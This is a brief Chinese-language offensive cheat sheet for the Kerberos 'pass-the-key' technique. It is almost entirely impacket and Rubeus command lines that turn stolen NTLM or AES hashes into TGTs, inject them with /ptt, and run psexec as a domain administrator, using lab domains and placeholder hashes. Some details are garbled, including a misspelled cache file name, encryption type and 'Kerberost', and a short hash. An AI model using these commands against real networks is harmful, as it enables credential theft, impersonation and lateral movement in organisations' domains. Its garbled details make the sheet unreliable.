Links

PASS-THE-KEY

在这种技术中,我们不是直接传递哈希值,而是使用帐户的 NTLM 哈希值来请求有效的 Kerberost 票证 (TGT)

impacket

>python ./getTGT.py -hashes ":1a59bd44fe5bec39c44c8cd3524dee" lab.ropnop.com
>export KRB5CCNAME="/root/impacket-examples/velociraptor.ccache"
>python3 psexec.py "jurassic.park/[email protected]" -k -no-pass
>./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com
>ktutil -k ~/mykeys add -p [email protected] -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
>kinit -t ~/mykers [email protected]
>klist

Rubeus

>.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt
>.\Rubeus.exe asktgt /user:Administrator /aes256:[AES256HASH] /opsec /ptt
>.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe